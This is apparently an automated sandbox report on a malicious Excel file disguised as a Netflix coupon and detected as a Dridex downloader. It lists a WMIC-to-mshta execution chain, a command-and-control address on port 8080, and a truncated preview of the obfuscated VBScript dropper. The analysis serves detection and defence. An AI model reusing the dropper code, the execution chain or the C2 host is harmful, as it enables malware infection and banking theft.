Loading ...

Play interactive tourEdit tour

Windows Analysis Report Netflix coupon-32822.xlsb

Overview

General Information

Sample Name:Netflix coupon-32822.xlsb
Analysis ID:528514
MD5:61f534da1002124f4352bde4e786fec3
SHA1:da668a643616d9e283520b7f6604d011a0a2e8dd
SHA256:4449394fb44d3169450f8041fe0d5eaf202f6b743124d7f52327773e02c65541
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2704 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2924 cmdline: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2244 cmdline: mshta C:\ProgramData\QiLuJMFtkBaWg.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\QiLuJMFtkBaWg.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2704, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", ProcessId: 2924
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2704, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf", ProcessId: 2924

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Netflix coupon-32822.xlsbReversingLabs: Detection: 17%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.140.185.205:8080
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.140.185.205:8080
      Source: Joe Sandbox ViewIP Address: 158.140.185.205 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: unknownTCP traffic detected without corresponding DNS query: 158.140.185.205
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.661185704.0000000003E60000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.444717454.0000000001BA0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.661185704.0000000003E60000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F568E3E.pngJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\QiLuJMFtkBaWg.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: Netflix coupon-32822.xlsbMacro extractor: Sheet: Macro1 contains: urlmon
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Netflix coupon-32822.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: Netflix coupon-32822.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.444589223.0000000000380000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: Netflix coupon-32822.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 48
      Source: Netflix coupon-32822.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: Netflix coupon-32822.xlsbReversingLabs: Detection: 17%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\QiLuJMFtkBaWg.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\QiLuJMFtkBaWg.rtf"
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Netflix coupon-32822.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE94.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Netflix coupon-32822.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: Netflix coupon-32822.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Netflix coupon-32822.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: qilujmftkbawg.rtf
      Source: unknownProcess created: cmd line: qilujmftkbawg.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2280Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 2640Thread sleep time: -60000s >= -30000s
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.660346326.0000000001190000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.660346326.0000000001190000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.660346326.0000000001190000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting4NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Netflix coupon-32822.xlsb6%VirustotalBrowse
      Netflix coupon-32822.xlsb18%ReversingLabsScript-WScript.Trojan.XBAgent

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.661185704.0000000003E60000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.661185704.0000000003E60000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.660923148.0000000003C67000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.444717454.0000000001BA0000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.660702058.0000000003A80000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    158.140.185.205
                    unknownIndonesia
                    63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528514
                    Start date:25.11.2021
                    Start time:12:19:07
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 4m 45s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:Netflix coupon-32822.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    12:19:36API Interceptor451x Sleep call for process: mshta.exe modified
                    12:19:36API Interceptor11x Sleep call for process: WMIC.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    158.140.185.205Netflix coupon_18402567.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    MYREPUBLIC-AS-IDPTEkaMasRepublikIDrequest 14028.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    request 14028.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    offer680834.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    offer680834.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    permission73815.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    permission73815.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    Netflix coupon_18402567.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    Netflix coupon_18402567.xlsbGet hashmaliciousBrowse
                    • 158.140.185.205
                    YBQdofofqHGet hashmaliciousBrowse
                    • 103.130.166.173

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\QiLuJMFtkBaWg.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4574
                    Entropy (8bit):5.070771259953445
                    Encrypted:false
                    SSDEEP:48:tCidTT5p6Dfo29iSpP3tVeuFBrGBFzXcObl2cqiTvlA59D2q6A85NXSKpeGedmpa:F5p6kSpl+jzbXTjlOkAoNJp5Q
                    MD5:44B4363899FB982B73D00D144E6C87FD
                    SHA1:255D4330D6F738F9DF8E2914E961B9C17A0BBDA2
                    SHA-256:3E4A3197D5283ADCFB9D2D0A3C2AE9F6351F4986777FA74340FFD5F3CEB9CF1C
                    SHA-512:B211ABCC5FF4CC581B91B3D6D74986974FC4F3CEBD66F64418174977D3DFE9A3D970D98A3684DF627DC5EAFF7DAD52621F608CAD12068CAD605EE3A45D73BD48
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\QiLuJMFtkBaWg.rtf, Author: Joe Security
                    Reputation:low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..K_A_p_L_x_Z_t_v_B_S_T_G = "ru" & "ndl" & Chr(108+1-1) & "" & "32." & "exe" & Chr(32+1-1) & "C:\" & Chr(92+1-1) & "Pro" & "" & "gra" & Chr(109+1-1) & Chr(68+1-1) & Chr(97+1-1) & "" & "" & "ta\" & Chr(109+1-1) & "fni" & "gge" & Chr(114+1-1) & Chr(46+1-1) & "bi" & "n W" & "sp" & "Fr" & Chr(101+1-1) & "eS" & "tri" & "ng" & ""..Set Y_N_P_L_D_G_N_V = CreateObject(Chr(77+1-1) & "SXM" & "L2" & Chr(46+1-1) & Chr(83+1-1) & Chr(101+1-1) & "rv" & "" & Chr(101+1-1) & Chr(114+1-1) & "XML" & "" & "HTT" & "" & "P." & "6.0")....i_c_b_P_K_C_M_B = "Ws" & "cri" & "pt" & "" & "" & Chr(46+1-1) & "" & Chr(83+1-1) & "hel" & "" & Chr(108+1-1)..Set v_Z_g_C_Q_Y_X = CreateObject(i_c_b_P_K_C_M_B)..C_X_X_n_E_w_a_D_p_J_w = LCase(v_Z_g_C_Q_Y_X.expandenvironmentstrings("%U
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\781FED27.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 225 x 318, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):36620
                    Entropy (8bit):7.972183204134745
                    Encrypted:false
                    SSDEEP:768:8PiCou6QJOk5ipMok5ILiF5k//AoHUkADn7zUW2dWsQFVvZwDl8jKnVbl:8PqrE3gpMokPF58Ik4kosQFVvSuMz
                    MD5:7B2878745781451C68357AB475E17FA0
                    SHA1:0D910014D49CEAAAA4E58EA29EBC3459842A0144
                    SHA-256:485328962DD448A4CF9340B2D66C696429A6B7B4AB238ABB52749BFC1CE6AE8F
                    SHA-512:CFCD9E004F6DCEB0E03F2A4FA799780343B6F329A26C3966DDC9070BB8906490453511667B7BE1738CC7C6FC0FBB5CE10ACC0A84E4EB344F1ECA7BE8C70B487B
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......>.....{.w4...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F568E3E.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 293 x 40, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2950
                    Entropy (8bit):7.90023348216902
                    Encrypted:false
                    SSDEEP:48:nqUZws/f1eM17wQyCXoWmM7XwvIkYmR7eyUk4W2YamkW/1HQjYhI05+eniEuRmfl:n/ZT/te81y4twvjewl2V+0Yu0ouiEuUN
                    MD5:BDEF057D58F7E0F5F2DD6B22B983DFB5
                    SHA1:C06E05C2C6FFDBBB5266E0536EE109A0D72F11AF
                    SHA-256:0B56D5A4FF63A3B01345160479D476670D92A009EA387746F0B13724F786954E
                    SHA-512:D992AA4B1F68B401C61F29165405FD25420ED9EFF882EE4B806729447A1D3FD7C4B257A815E20CF96D3F6336741942A52AEB44462137016D5E5114E5E0A2CEE9
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR...%...(.....7.{J...MIDATx..yXSW..OVC$.%......2*..Aj..V-j.i..N[;....~.ck.X;..~....NG.n...".QA.(ZQd."..Y....$...gH^B..?..>.8.....s.}wy|0................8.0.........7..>p.a0.......o..}.|.`.....C.8.0.........7..>p.a0.......o..}.|.`.....C.l..]..gSg......^.D..XVX..F....}1O.!.4.e.\i..G.n...u..t..Y..I.g.......D.?.!....|xi..Y..eK2.....~.;....6K2.-{.gF<..sD.V....).Q.O7.".1..h.........].W78dI.....!e..3%..~..hmT>k..=V...[gJ.M/...8.8..tw....].....P......\t.].Cb....nt.G.ZE......z...R...x..............1..q.W..dE......d..E..Qg..l.fyE..D.1.`....f.._j.!..b..q..N..}..yY.....}}...W .'.%oX...!Ql.Ek..........sK.vs.|[........q).....Wl..Y.goz.+..j....!...~......L.......X..>..>..f.<=Dq1~...?.....Z\2g.F&....}.ftV_".$.. +:.U{..fE....E..z....E..&/..Uu..Hi......)[Z.....$&.w.%'.....D...j...~.!r.N..Q...../.E?.+...}.....x..w..m.I23B........=Z.g/u......... ...Z........(E.....{..W...%..|.u.#HN|a.wt$.4............o....x.Us..12w9.;.V....V*.....s.h$[e6.\..
                    C:\Users\user\Desktop\~$Netflix coupon-32822.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
